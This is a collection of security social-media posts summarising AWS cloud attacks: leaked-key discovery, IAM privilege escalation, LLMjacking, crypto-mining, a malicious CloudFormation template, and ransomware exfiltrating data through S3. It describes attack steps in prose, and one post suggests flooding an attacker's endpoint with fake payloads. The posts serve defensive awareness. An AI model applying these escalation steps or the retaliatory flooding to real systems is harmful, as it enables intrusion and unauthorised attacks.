Emerging Threats in AWS Security Breaches

The Rapid7 #MDR team has been tracking a new threat group targeting AWS environments for data theft and extortion. Calling themselves Crimson Collective, this group starts by finding leaked long-term AWS access keys using tools like TruffleHog, then creates new IAM users and attaches AdministratorAccess to move laterally and escalate privileges. From there, they map the environment through extensive API calls — ListRoles, DescribeInstances, DescribeSnapshots, DescribeDBClusters — and export RDS and EBS data through S3. In some cases, they’ve even used AWS Simple Email Service from within the victim’s environment to deliver extortion notes. This campaign is another reminder that long-term credentials and overly permissive IAM policies continue to be prime targets for abuse, and that adversaries are getting better at blending in with legitimate cloud operations. 👇 Detailed analysis from the Rapid7 team: https://lnkd.in/eNyy2D2X

🚨 ☁️ - New Recorded Future Insikt Group report! This is essential reading for anyone building or defending in modern hybrid, SaaS-heavy, or cloud-native environments. The report outlines a clear and uncomfortable reality: cloud environments are now central to how threat actors operate, not just a peripheral target. Please read and share with your networks! Our analysis highlights five key threat vectors shaping the current cloud threat landscape: cloud abuse, exploitation, endpoint misconfiguration, cloud ransomware, and credential abuse. What emerges is a picture of attackers who are not only exploiting misconfigured or vulnerable infrastructure but actively adopting cloud-native tooling and services for persistence, evasion, and impact. 🔑 Cloud abuse, in particular, is no longer rare — it’s routine. Threat actors are standing up their own infrastructure in AWS, Azure, Google Cloud, and even lesser-known providers, blending in with legitimate traffic to host C2 nodes, phishing kits, and credential harvesting sites. In some cases, they’re compromising victim cloud environments directly to mine cryptocurrency, exfiltrate data, or abuse expensive APIs like those tied to large language models — a tactic now known as “LLMjacking.” Initial access often starts with the usual suspects: misconfigured endpoints and exposed secrets or credentials, many of which are still discovered en masse through open-source scanners and repos. Credential abuse remains a direct path to full-tenant compromise, especially in environments lacking basic protections like passwordless auth or adaptive MFA. Threat actors have shown a growing ability to escalate privileges and maintain access by manipulating identity federation, forging SAML tokens, and abusing synchronization accounts — making cloud identity a persistent battleground. What makes this report especially valuable is that it doesn’t stop at threat modeling. It provides practical, grounded mitigation and detection strategies aligned to each phase of the attack chain. These include monitoring for suspicious cloud API usage, spotting unauthorized data exfiltration via storage buckets, detecting anomalous access patterns, and reinforcing controls over third-party and federated identities. It also urges organizations to revisit assumptions around visibility — many cloud compromises go unnoticed until the financial or operational damage is done, and native logging alone isn’t enough to catch sophisticated misuse. What’s most striking, though, is the strategic shift underway. Threat actors increasingly rely on cloud infrastructure not just as a target, but as a core part of their kill chain. As adoption accelerates, the question isn’t if cloud infrastructure will be targeted — it’s how much of your detection, logging, and identity controls are ready for when it is. Because at this stage, the cloud isn’t just someone else’s computer — it’s someone else’s kill chain.

𝐋𝐋𝐌𝐣𝐚𝐜𝐤𝐢𝐧𝐠 𝐢𝐧 𝐭𝐡𝐞 𝐰𝐢𝐥𝐝: how threat actors exploit AI using compromised AWS NHIs. Our latest research at Entro Security demonstrates the alarming speed at which threat actors capitalize on exposed NHIs to abuse LLMs like DeepSeek, Claude and GPT. Our security researchers intentionally leaked functional AWS keys across public platforms and monitored their activity: 👁️🗨️17 𝐦𝐢𝐧𝐮𝐭𝐞𝐬: the average time it took for attackers to find and probe the exposed keys. The fastest attempt happened in less than 9 minutes. 👁️🗨️ 𝐑𝐞𝐜𝐨𝐧𝐧𝐚𝐢𝐬𝐬𝐚𝐧𝐜𝐞 𝐟𝐢𝐫𝐬𝐭: attackers didn’t immediately run AI workloads. Instead, they first enumerate available models, checked cloud spend, and assessed which LLM models could be accessed. 👁️🗨️𝐇𝐮𝐧𝐝𝐫𝐞𝐝𝐬 𝐨𝐟 𝐚𝐭𝐭𝐞𝐦𝐩𝐭𝐬 𝐭𝐨 𝐢𝐧𝐯𝐨𝐤𝐞 𝐦𝐨𝐝𝐞𝐥𝐬: once they mapped out the AWS keys' capabilities, threat actors tried to generate content, effectively attempting to turn our AWS environment into their own AI resource. This research confirms that stolen NHIs are actively sought, tested, and systematically abused for malicious AI activity. Securing them is not a future concern, it's a present reality. If your NHIs are compromised, attackers will find them and they won't stop at reconnaissance. Read the full research ⬇️

⚠️ This is a big one folks...a new AWS Crypto-Mining Attack Vector! Compromised cloud credentials aren’t a “maybe.” They’re a certainty. AWS has just covered a familiar but still costly pattern, crypto crews using stolen AWS credentials to hijack cloud accounts and spin up infrastructure for mining and fraud. No zero-days, No fancy malware, Just valid credentials and overly powerful permissions. 🚨 What the attackers did: Once credentials were in hand, the path was predictable: - Log in with compromised AWS access keys - Enumerate IAM to understand privilege boundaries - Abuse permissions to launch high-cost compute, EC2, GPUs, Spot fleets - Modify networking and security groups to avoid detection - Run crypto miners until billing alerts, or the CFO, noticed This isn’t advanced persistence. It’s expected behavior when IAM allows it. 🔑 The real issue isn’t stolen credentials. Credentials get phished, leaked, logged, or reused. That’s reality. The real question is, What can those credentials actually do? If a compromised principal can: - RunInstances - Pass roles - Attach policies - Modify instance profiles - Bypass guardrails ...Then the attacker wins before you even detect them. 🧠 Why detection alone keeps failing Most teams rely on: - CloudTrail alerts after resources are created - Cost anomaly detection after spend explodes - Manual IAM reviews that drift over time ...That’s all reactive. By the time you see the alert, the permissions already allowed the damage. 🛑 How to stop this class of attack You have two real options: 1. By hand - Identify privileged cloud permissions, compute launch, role pass, policy attach, network mutation - Enforce default deny on those actions - Require explicit, time-bound approval for use - Continuously re-audit as policies and services change ...Effective, but painful to scale. 2. Automated, Cloud Permissions Firewall. Sonrai Security's Cloud Permissions Firewall: - Identifies which permissions are truly privileged - Enforces guardrails at the permission layer - Blocks abuse even when credentials are valid - Enables just-in-time access instead of standing privilege ...So when credentials are compromised, attackers hit a wall, not a GPU fleet. 💡 The takeaway You don’t prevent every credential compromise. You prevent what compromised credentials are allowed to do. If someone can mine crypto, snapshot data, or escalate IAM with a single stolen key, that’s not an incident response problem. That’s an IAM architecture problem. 👀 If you haven’t reviewed who can launch compute, pass roles, or attach policies lately, this is your reminder. Happy to walk through what this looks like manually, or how teams automate it with a Cloud Permissions Firewall. Details directly from AWS: https://lnkd.in/eyHHcdZr #AWS #IAM #CloudSecurity #CloudIdentity #CryptoMining #TheyJustLogin

A few months ago, we found a malicious AWS CloudFormation template trying to breach a customer's AWS account. It was disguised as “AWS Support for Fargate” Here’s what it’s really up to: 1. Grants itself administrator-level permissions via a fake support IAM role 2. Deploys a lambda function (in-line) to exfiltrate role ARN to an external API Gateway endpoint 3. Invoke itself using AWS CloudFormation CustomResource 📘 Blue team tips - Always review the IAM roles, policies, and external calls in any template. - Use the IAM Access Analyzer to verify external trust relationships - Don’t blindly trust anything labeled “AWS Support” — verify it first! - Report to AWS Security teams ASAP 📕 Red team tips - The malicious actor is identified by the AWS account ID in the AssumeRole policy. - Consider flooding the API endpoint with randomly generated payloads using fake IAM role ARNs.

⚠️ New research published on Ctrl-Alt-Intel today: Multiple cryptocurrency organisations compromised by a suspected DPRK-affiliated threat actor⚠️ https://lnkd.in/gTRT-Wxh The campaign targeted multiple avenues of the crypto supply chain: staking platforms, exchange software providers, and the exchanges themselves. We observed standard CVEs used for initial access (React2Shell), but the AWS post-exploitation tradecraft was particularly interesting: - Valid AWS tokens used to enumerate S3, RDS, Lambda, EKS, ECR, and Secrets Manager - Databases deliberately exposed to the internet for direct access - Terraform state files targeted for credentials - Lateral movement from AWS into Kubernetes clusters - Docker images exfiltrated from crypto-exchange container registries - AWS Secrets Manager pillaged for plaintext secrets Check out the blog for the full analysis! The good news? Hunt Intelligence, Inc. archived a snapshot of one of the threat actors exposed open-directories over a month ago, during active exploitation 👏

🔐 Deep Dive into AWS Pentesting: Methodology, Real Scenarios & Essential Commands Staying ahead of cloud security threats requires more than just theoretical knowledge—it demands practical, scenario-based understanding. I just explored an excellent, detailed guide on AWS penetration testing that breaks down the entire process from reconnaissance to exploitation and reporting. This is a must-read for Security Engineers, Cloud Architects, DevOps professionals, and anyone responsible for AWS infrastructure. Here’s what the comprehensive guide covers: ✅ The AWS Pentesting Methodology: A structured approach aligned with industry standards. ✅ Pre-Engagement & Legalities: The crucial first step—ensuring authorized testing. ✅ Detailed Reconnaissance: Techniques to map the AWS attack surface (assets, S3 buckets, CloudTrail misconfigurations). ✅ Exploitation Scenarios: Hands-on walkthroughs for common vulnerabilities: - Exposed IAM keys & credential compromise. - Privilege escalation via misconfigured IAM policies. - S3 bucket enumeration & data exfiltration. - SSRF attacks leading to instance metadata exposure. ✅ Post-Exploitation: Maintaining access, pivoting, and internal network mapping. ✅ Essential Toolset: Practical commands for tools like awscli, Pacu, S3Scanner, CloudFrunt, and Metasploit. ✅ Reporting & Remediation: Turning findings into actionable intelligence for defenders.

An attacker gained access to an AWS environment via credentials stored in an S3 bucket. That's not the surprise; the surprise is that they were able to leverage that test account to *full* admin access in 10 minutes, with the help of AI. Kudos to Sysdig threat hunters for catching the attacker breaking in. The details are interesting, here are a few excepts from the story from The Register. "The threat actor achieved administrative privileges in under 10 minutes, compromised 19 distinct AWS principals, and abused both Bedrock models and GPU compute resources," Sysdig's threat research director Michael Clark and researcher Alessandro Brucato said in a blog post about the cloud intrusion." So the attacker had some skills and help from an LLM to speed up the attack. Clearly, *DO NOT STORE ACCESS KEYS* in public buckets. What else can we learn from this? The attacker "achieved privilege escalation through Lambda function code injection, abusing the compromised user's UpdateFunctionCode and UpdateFunctionConfiguration permissions". So, even though you think you've limited your risk, always implement the principal of least privilege. We knew this was coming, but this time we have evidence that it has happened. Attackers are relying on AI to help them at almost every stage in the attack chain, and it is a matter of time before criminals can fully automate attacks at scale. What can you do? 1) Make sure you follow basic cybersecurity hygiene, by not storing credentials in publicly available S3 buckets, PLEASE! 2) Practice the principal of least privilege, i.e. only grant the privs needed to do that job, then either revoke the privs or access after it is needed. 3) Monitor your environment, 24x7, 365 days a year. If you can't do it, hire someone who can. For more details you can read the article at the link below: https://lnkd.in/eJHecchb

THREAT ANALYSIS: RANSOMWARE SAMPLES ABUSE AWS S3 TO STEAL DATA ℹ️ Researchers have found Golang ransomware samples that abuse Amazon S3 Transfer Acceleration feature to exfiltrate the victim’s files and upload them to the attacker-controlled S3 buckets. ℹ️ AWS credentials hard coded in the samples were used to track the associated AWS Account IDs linked to malicious activities, serving as valuable IOCs. ℹ️ Attempts were made to disguise the Golang ransomware as the notorious LockBit ransomware. This was done presumably to use the ransomware family’s notoriety to further pressure victims. ℹ️ Researchers shared their findings with the AWS Security team. It is important to note that their finding is not a vulnerability in any of AWS Services. They confirmed with AWS the behavior they identified for this threat actor's activity and it was found to violate the AWS acceptable use policy. The reported AWS access keys and account have been suspended. Report: https://lnkd.in/dqyJ8jZ7 #threathunting #threatdetection #threatanalysis #threatintelligence #cyberthreatintelligence #cyberintelligence #cybersecurity #cyberprotection #cyberdefense